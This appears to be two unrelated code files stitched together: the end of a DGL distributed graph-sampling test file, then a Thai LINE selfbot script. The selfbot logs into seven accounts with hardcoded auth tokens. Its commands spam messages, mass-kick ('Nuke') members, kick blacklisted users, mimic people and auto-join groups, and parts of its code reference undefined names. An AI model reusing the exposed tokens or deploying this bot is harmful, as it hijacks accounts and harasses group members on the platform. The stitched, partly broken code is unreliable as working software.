with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_in_subgraph_shuffle(Path(tmpdirname), 2)
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
def test_standalone_etype_sampling():
reset_envs()
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_etype_sampling_heterograph(Path(tmpdirname), True)
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_etype_sampling(Path(tmpdirname), True)
check_standalone_etype_sampling(Path(tmpdirname), False)
if __name__ == "__main__":
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_etype_sampling_heterograph(Path(tmpdirname), True)
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_etype_sampling(Path(tmpdirname), True)
check_standalone_etype_sampling(Path(tmpdirname), False)
check_standalone_sampling(Path(tmpdirname), True)
check_standalone_sampling(Path(tmpdirname), False)
os.environ['DGL_DIST_MODE'] = 'distributed'
check_rpc_sampling(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 1)
check_rpc_get_degree_shuffle(Path(tmpdirname), 1)
check_rpc_get_degree_shuffle(Path(tmpdirname), 2)
check_rpc_find_edges_shuffle(Path(tmpdirname), 2)
check_rpc_find_edges_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_find_edges_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_find_edges_shuffle(Path(tmpdirname), 2)
check_rpc_in_subgraph_shuffle(Path(tmpdirname), 2)
check_rpc_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_hetero_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_hetero_sampling_empty_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_etype_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_hetero_etype_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_hetero_etype_sampling_empty_shuffle(Path(tmpdirname), 1)
|
2.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time, random, sys, ast, re, os, io, json, subprocess, threading, string, codecs, requests, ctypes, urllib, urllib2, urllib3, wikipedia, tempfile
from bs4 import BeautifulSoup
from urllib import urlopen
from io import StringIO
from threading import Thread
from gtts import gTTS
from googletrans import Translator
cl = LINETCR.LINE()
cl.login(token="Et4dAcXqNZY1MdJpQjId.EK+RXmzq+hz56T9crCkLRq.owlMIqHyRcWNCw6nHrla0S9F9gByJvz/bfbuvZUerDI=")
cl.loginResult()
print "cl login success"
ki = LINETCR.LINE()
ki.login(token="EpZmUMp6CzpG2MxrdrE9.Z2jqcI8fppmz+7xOGNlyEq.ttlVXdxR2I6A72rLY3B7apC+hyyUyuBQnYkKCO5J9RQ=")
print "ki login success"
ki2 = LINETCR.LINE()
ki2.login(token="Ep5x39yHINyEEVb7eaYa.Ql+Iq95c4olkmxSaoadLoG.guCtCeFRGAxadoTr/JxRhLsDyLTeTNTj285/W6Moadw=")
print "ki2 login success"
ki3 = LINETCR.LINE()
ki3.login(token="Epezl3XFYfIArh9F82x6.SGby4XQI1gAOTET1lBqQ9G.Kha8WacxePkq1eck0Kaxb83kSJ4odJGyVV9aMSvEspI=")
print "ki3 login success"
ki4 = LINETCR.LINE()
ki4.login(token="EpUfPCc0QdIkGkErgJca.Q6+YE7DHLRb+4/UXmbKggG.LJL7TYkXyf5UpTvXGKBFSmyYPQJAz9cgbzl5bsKJBJI=")
print "ki4 login success"
ki5 = LINETCR.LINE()
ki5.login(token="Epyyzy4CVbNqz8DSept8.7fLTCfOW6V77bikOdoT16a.QFITEuKTLXnmPlJ6XX43+Oe3oF3jKsLCE4JFL/mwOcA=")
print "ki5 login success"
ki6 = LINETCR.LINE()
ki6.login(token="EpPC6mLG2zwhDQo5Vx0d.2zlXNOJh2/W1Z19qm0HVpq.1KpNIxthj+z/VqsRGk5q7Yg99BKSdL8ZrC7t2SSmPHE=")
print "ki6 login success"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage =""" •─ ͜͡✫-[✭] ༺ πနးຫຮี่のีধ์͜͡ ༻[✭]- ͜͡✫─•
👻 คำสั่ง ➠ ดูคำสั่ง
👻 คำสั่ง2 ➠ ดูคำสั่ง2
👻 ทักเข้า ➠ เช็คข้อความทักเข้า
👻 ทักออก ➠ เช็คข้อความทักออก
👻 ทักลบ ➠ เช็คข้อความทักคนลบ
👻 ทักเข้า: +ข้อความ ➠ ตั้งทักเข้า
👻 ทักออก: +ข้อความ ➠ ตั้งทักคนออก
👻 ทักลบ: +ข้อความ ➠ ตั้งทักคนลบ
👻 แท็ก1 ➠ เช็คข้อความแท็ก
👻 แท็ก2 ➠ เช็คข้อความแท็ก
👻 แท็ก1: +ข้อความ ➠ ตั้งแท็ก
👻 แท็ก2: +ข้อความ ➠ ตั้งแท็ก
👻 Message set:: +ข้อความ ➠ ตั้งข้อความ
👻 Help set:: +ข้อความ ➠ ตั้งข้อความ
👻 Pesan add- ➠ เพิ่มข้อความ
👻 เช็คข้อความแอด ➠ เช็คตั้งข้อความแอด
👻 Change ➠ ยกเลิกการตั้งข้อความ
👻 Message set ➠ ข้อความ
👻 Come Set: ➠ ตั้งคอมเม้น
👻 Com ➠ เช็คคอมเม้น
👻 me ➠ คทเรา
👻 ผู้สร้าง ➠ ผู้สร้างบอท
👻 midเรา ➠ เช็คเราเรา
👻 1-6mid ➠ เช็คmidคลิ้ก
👻 คลิ้กmid ➠ เช็คmidคลิ้ก
👻 ชื่อ: +ข้อความ ➠ เปลี่ยนชื่อคลิ้ก
👻 เช็คออน์ ➠ เช็คเวลาทำงานบอท
👻 ตัส: +ข้อความ ➠ ตั้งตัสคลิ้ก
👻 ชื่อเรา: +ข้อความ ➠ เปลี่ยนชื่อเรา
👻 1-6ชื่อ: +ข้อความ ➠ เปลี่ยนชื่อคลิ้ก
👻 ตัสเรา: +ข้อความ ➠ เปลี่ยนตัสเรา
👻 บอท ➠ คทคลิ้ก
👻5-6ตัส: +ข้อความ ➠ เปลี่ยนตัสคลิ้กตัว5-6
👻 1-6 ➠ เช็คคลิ้ก
👻 Mid: +mid ➠ g=H88mmid
👻 kick +mid ➠ ลบโดยmid
👻 เช็ค: +mid ➠ เชิญโดยmid
👻 Me ➠ เช็คเซล
👻 กำ ➠ เช็คเซล
👻 5555 ➠ เช็คเซล
👻 Sp ➠ เช็คสปีด
👻 respon ➠ เช็คเซล
👻 Bot? ➠ เช็คเซล
👻 บอทเข้า ➠ สั่งคลิ้กเข้า
👻 เข้า3-6 ➠ คลิ้ก3-6เข้า
👻 1-6เข้า ➠ คลิ้กเข้า
👻 ออก ➠ คลิ้กออก
👻 1-6ออก ➠ สั่งคลิ้กออก
👻 #leave ➠ ออกแชทรวม
👻 คนอ่าน ➠ ดูคนอ่าน
👻 Name me ➠ ชื่อ
👻 Copy @ ➠ คัดลอก
👻 backup ➠ คืนร่าง
👻 Tx: +ข้อความ ➠
👻 Fancytext:: +ข้อความ ➠
👻 Spam on +เลข+ข้อความ ➠ รันข้อความ
👻 มอง ➠ รายชื่ออ่าน
👻 tag all ➠ แท็ก
👻 เช็คอ่าน ➠ เช็คระบบอ่าน
👻 Gbroadcast +ข้อความ ➠
👻 Cbroadcast +ข้อความ ➠
👻 Nuke ➠ บิน
👻 Bye @ ➠ ลบ
👻 Nk @ ➠ เตะ
👻 blocklist ➠ เช็ครายการบล็อค
👻 kill ➠ ลบบชดำ
👻 ข้อมูลบัญชีดำ ➠ เช็คข้อมูลบัญชีดำ
👻 ล้างดำ ➠ ล้างบชดำ
👻 banlist ➠ เช็ครายการดำ
👻 เช็คดำ ➠ เช็ครายการดำ
👻 ขาวคท ➠ ทำขาวโดยคท
👻 ดำคท ➠ ทำดำโดยคท
👻 ขาว: ➠ ทำขาว
👻 ดำ1: ➠ ทำดำ
👻 ขาว @ ➠ ทำขาว
👻 ดำ @ ➠ ทำดำ
👻 Group cancelall ➠ ยกเลิกห้องรัน
👻 รายละเอียดกลุ่ม ➠ เช็ครายละเอียดกลุ่ม
👻 เช็คidกลุ่ม ➠ เช็คGIDกลุ่ม
👻 เช็คกลุ่ม ➠ เช็ครายการกลุ่ม
👻 Cancel ➠ ยกเลิกค้างเชิญ
👻 ยกเลิกเชิญ ➠ ยกเลิกค้างเชิญ
👻 ลบแชทบอท ➠ ลบแชทคลิ้ก
👻 l-7ลบรัน ➠ ลบรันคลิ้ก
👻 url ➠ ขอลิ้งค์ห้อง
👻 update ➠ ปรับเวลา
👻 ตั้งเวลา: +เลข ➠ ตั้งเวลา
👻 ชื่อวลาปิด ➠ ปิดชื่อมีเวลา
👻 ชื่อเวลาเปิด ➠ เปิดชื่อมีเวลา
👻 1ลิ้งค์กลุ่ม ➠ ขอลิ้งค์ห้อง
👻 2ลิ้งค์กลุ่ม ➠ ขอลิ้งค์ห้อง
👻 ลิ้งค์+ ➠ ขอลิ้งค์ห้อง
👻 Gn +ข้อความ ➠ เปลี่ยนชื่อห้อง
👻 ชื่อกลุ่ม: +ข้อความ ➠ เปลี่ยนชื่อห้อง
👻 ของขวัญ ➠ ให้ของขวัญ
👻 1-4ของขวัญ ➠ ให้ของขวัญ
👻 Mimic target ➠ เลียนแบบ
👻 เช็คพูดตาม ➠ เช็ครายชื่อคนพูดตาม
👻 ลบพูดตาม @ ➠ ลบที่เพิ่มพูดตาม
👻 พูดตาม @ ➠ เพิ่มคนพูดตาม
👻 lurkers ➠ อ่านแบบแทก
👻 lurk off ➠ ปิดอ่าน
👻 lurk on ➠ เปิดอ่าน
👻 อ่าน ➠ เแดดูชื่อคนอ่าน
👻 Set2 ➠ เช็คตั้งค่า
👻 Set1 ➠ เช็คตั้งค่า
👻 ปิดหมด ➠ ปิดระบบกัหมด
👻 เปิดหมด ➠ เปิดระบบหมด
👻 ปิดลิ้งค์ ➠ ปิดลิ้งค์กลุ่ม
👻 เปิดลิ้งค์ ➠ เปิดลิ้งค์กลุ่ม
👻 กันยกเลิก1ปิด ➠ ปิดการยันเลิก
👻 กันยกเลิก1เปิด ➠ เปิดกันยกเลิก
👻 ปิดเเจ้งเตือนบอท ➠ ปิดเเจ้งเตือนบอท
👻 เปิดเเจ้งเตือนบอท ➠ เปิดเเจ้งเตือนบอท
👻 ปิดแจ้งเตือน ➠ ปิดระบบแจ้งเตือน
👻 เปิดแจ้งเตือน ➠ เปิดระบบแจ้งเตือน
👻 คอมเม้นปิด ➠ ปิดระบบคอมเม้น
👻 คอมเม้นเปิด ➠ เปิดระบบคอมเม้น
👻 แอดปิด ➠ ออโต้แอดปิด
👻 แอดเปิด ➠ ออโต้แอดเปิด
👻 แชร์ปิด ➠ เช็คลิ้งค์โพสปิด
👻 แชร์เปิด ➠ เช็คลิ้งค์โพสเปิด
👻 Group cancel: off ➠ ปิดระบบกินห้องรัน
👻 Group cancel: on ➠ เปิดระบบกินห้องรัน
👻 ออกแชทรวมปิด ➠ ปิดออกจากแชทรวม
👻 ออกแชทรวมเปิด ➠ เปิดออกจากแชทรวม
👻 เข้าออโต้ปิด ➠ ปิดการเข้าออโต้
👻 เข้าออโต้เปิด ➠ เปิดการเข้าออโต้
👻 กันยกเลิกปิด ➠ ปิดระบบกันยกเลิก
👻 กันยกเลิกเปิด ➠ เปิดระบบกันยกเลิก
👻 กันเชิญปิด ➠ ปิดระบบกันเชิญ
👻 กันเชิญเปิด ➠ เปิดระบบกันเชิญ
👻 กันลิ้งค์ปิด ➠ ปิดระบบกันลิ้งค์
👻 กันลิ้งค์เปิด ➠ เปิดระบบกันลิ้งค์
👻 ป้องกันปิด ➠ ปิดระบบกันลบ
👻 ป้องกันเปิด ➠ เปิดระบบกันลบ
👻 เช็คคทปิด ➠ ปิดอ่านคท
👻 เช็คคทเปิด ➠ เปิดอ่านคท
👻 ทักลบเปิด ➠ เปิดรับละลบ
👻 ทักลบปิด ➠ ปิดทักละลบ
👻 ทักออกปิด ➠ ปิดระบบทักคนออก
👻 ทักออกเปิด ➠ เปิดระบบทัดคนออก
👻 ต้อนรับปิด ➠ ปิดระบบทักเข้า
👻 ต้อนรับเปิด ➠ เปิดระบบทักเข้า
👻 เตะแท็กเปิด ➠ เปิดระบบเตะคนแท็ก
👻 เตะแท็กปิด ➠ ปิดระบบเตะคนแท็ก
👻 แท็กปิด ➠ ปิดระบบแท็ก
👻 แท็กเปิด ➠ เปิดระบบแท็ก
👻 อ่านปิด ➠ ปิดระบบอ่าน
👻 อ่านเปิด ➠ เปิดระบบอ่าน
👻 ปิดอ่าน ➠ ปิดระบบอ่าน
👻 เปิดอ่าน ➠ เปิดระบบอ่าน
👻 TL: ➠ โพส
•─ ͜͡✫-[✭] ༺ πနးຫຮี่のีধ์͜͡ ༻[✭]- ͜͡✫─•
"""
helpMessage2 ="""👻 .11 ➠
👻 T say ➠
👻 Me ban ➠
👻 Banlistall ➠
👻 Mban: ➠
👻 Com Bl cek ➠
👻 Com hapus Bl ➠
👻 Com Bl ➠
👻 Sayang say ➠
👻 Welcome ➠
👻 Say ➠
👻 ping ➠
👻 cancel ➠
👻 Beb @ ➠
👻 Cek @ ➠
👻 Telan @ ➠
👻 Bunuh @ ➠
👻 ☜ʕ•ﻌ•ʔ ➠
👻 [Auto] ➠
👻 พูด ➠
👻 siri-en ➠
👻 siri: ➠
👻 siri ➠
👻 Ry20 ➠
─────┅═ইई═┅─────
╔══════════════════
║ ✦โหมดเช็คตั้งค่าข้อความ✦
╠══════════════════
║✰ Hhx1 ➠เช็คข้อความต้อนรับ
║✰ Hhx2 ➠เช็คข้อความคนออก
║✰ Hhx3 ➠เช็คข้อความคนลบ
╠════════════════
║•─ ͜͡✫-[✭] ༺ πနးຫຮี่のีধ์͜͡ ༻[✭]- ͜͡✫─•
╚════════════════
"""
helo=""
KAC=[cl]
mid = cl.getProfile().mid
kimid = ki.getProfile().mid
ki2mid = ki2.getProfile().mid
ki3mid = ki3.getProfile().mid
ki4mid = ki4.getProfile().mid
ki5mid = ki5.getProfile().mid
ki6mid = ki6.getProfile().mid
mid = cl.getProfile().mid
Bots = ["u7a4febc4c650fc7679eadf4245c2a5ad"]
self = ["u7a4febc4c650fc7679eadf4245c2a5ad"]
admin = ["u7a4febc4c650fc7679eadf4245c2a5ad"]
owner = ["u7a4febc4c650fc7679eadf4245c2a5ad"]
Creator = ["u7a4febc4c650fc7679eadf4245c2a5ad"]
wait = {
"alwayRead":False,
"detectMention":True,
"kickMention":False,
"steal":False,
'pap':{},
'invite':{},
"spam":{},
'contact':False,
'autoJoin':True,
'autoCancel':{"on":False, "members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':False,
'message':"•─ ͜͡✫-[✭] ༺ πနးຫຮี่のีধ์͜͡ ༻[✭]- ͜͡✫─•",
"lang":"JP",
"comment":"AutoLike by •─ ͜͡✫-[✭] ༺ πနးຫຮี่のีধ์͜͡ ༻[✭]- ͜͡✫─•",
"commentOn":False,
"acommentOn":False,
"bcommentOn":False,
"ccommentOn":False,
"Protectcancl":False,
"pautoJoin":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"",
"likeOn":False,
"pname":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"qr":False,
"Backup":False,
"protectionOn":False,
"winvite":False,
"ainvite":False,
"binvite":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
"Hhx1":False,
"Hhx2":False,
"Hhx3":False,
"Notifed":False,
"Notifedbot":False,
"atjointicket":False,
"pnharfbot":{},
"pname":{},
"pro_name":{},
"tag1":"แท็กทำไมหรือ",
"tag2":"จะแท็กทำไม",
"posts":False,
}
wait2 = {
"readPoint":{},
"readMember":{},
"setTime":{},
"ROM":{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
settings = {
"simiSimi":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
mulai = time.time()
blacklistFile='blacklist.txt'
pendinglistFile='pendinglist.txt'
contact = cl.getProfile()
mybackup = cl.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def sendImageWithUrl(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def sendImageWithUrl(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
time.sleep(0.1) #Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def summon(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs)
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_, text=None, contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M2 = self._client.sendMessage(0,M)
M_id = M2.id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://obs-sg.line-apps.com/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
def sendImage2(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = cl.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def bot(op):
try:
if op.type == 0:
return
if op.type == 13:
if op.param2 in Boss + admin:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
cl.acceptGroupInvitation(op.param1)
G = cl.getGroup(op.param1)
ginfo = cl.getGroup(op.param1)
G.preventJoinByTicket = False
invsend = 0
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = False
cl.sendText(op.param1,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 15:
if wait["Notifed"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "ไปแร้วสะละ\n เเล้วพบกันใหม่นะ ")
print "MEMBER OUT GROUP"
if op.type == 17:
if wait["Notifed"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + " ☜ʕ•ﻌ•ʔ ")
cl.sendText(op.param1, " ยินดีต้อนรับครับ \n สวัสดีครับผม \n อย่าลืมปิดเสียงการเเจ้งเตือนด้วยนะ \n\n[By. ༺ πနးຫຮี่のีধ์͜͡ ༻]")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 19:
if wait["Notifed"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n ไม่น่าจะจุกเท่าไหร่หรอก ")
print "MEMBER HAS KICKOUT FROM THE GROUP"
if op.type == 15:
if wait["Notifedbot"] == True:
if op.param2 in Bots:
return
ki1.sendText(op.param1,cl.getContact(op.param2).displayName + "\n\n Bye~bye ")
ki2.sendText(op.param1,cl.getContact(op.param2).displayName + "\n\n Bye~bye ")
print "MEMBER OUT GROUP"
if op.type == 17:
if wait["Notifedbot"] == True:
if op.param2 in Bots:
return
ki1.sendText(op.param1,cl.getContact(op.param2).displayName + "\n\n•─ ͜͡✫-[✭] ༺ πနးຫຮี่のีধ์͜͡ ༻[✭]- ͜͡✫─•")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 19:
if wait["Notifedbot"] == True:
if op.param2 in Bots:
return
ki1.sendText(op.param1,cl.getContact(op.param2).displayName + "\n ไม่น่าจะจุกเท่าไหร่หรอก ")
ki2.sendText(op.param1,cl.getContact(op.param2).displayName + "\n ไม่น่าจะจุกเท่าไหร่หรอก ")
print "MEMBER HAS KICKOUT FROM THE GROUP"
if op.type == 15:
if wait["bcommentOn"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n" + str(wait["bcomment"]))
print "MEMBER OUT GROUP"
if op.type == 17:
if wait["acommentOn"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n" + str(wait["acomment"]))
print "MEMBER HAS JOIN THE GROUP"
if op.type == 19:
if wait["ccommentOn"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n" + str(wait["ccomment"]))
print "MEMBER HAS KICKOUT FROM THE GROUP"
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
if op.type == 13:
if wait["Protectcancl"] == True:
if op.param2 not in Bots:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.updateGroup(G)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"URL/QRが更新されました.☆(´・ω・`)\n時間 [⏰] ")
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
else:
cl.sendText(op.param1,"❇BY ༺ πနးຫຮี่のีধ์͜͡ ༻️ [⏰] ")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
else:
cl.sendText(op.param1,"❇️ มีการเชิญสมาชิกเข้าร่วมกลุ่ม ❇️ [⏰] ")
if op.type == 19:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[contact.mid for contact in cl.getGroup(op.param1).invitee])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[contact.mid for contact in cl.getGroup(op.param1).invitee])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 17:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
ks.updateGroup(G)
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
except:
pass
elif op.param2 not in admin + Bots:
random.choice(KAC).sendText(op.param1,"By. ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
pass
# Op program in Admin and User Comment By Googlez #
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"ᴄᴏᴍᴘʟᴇᴛᴇ ᴀʟʀᴇᴀᴅʏ")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
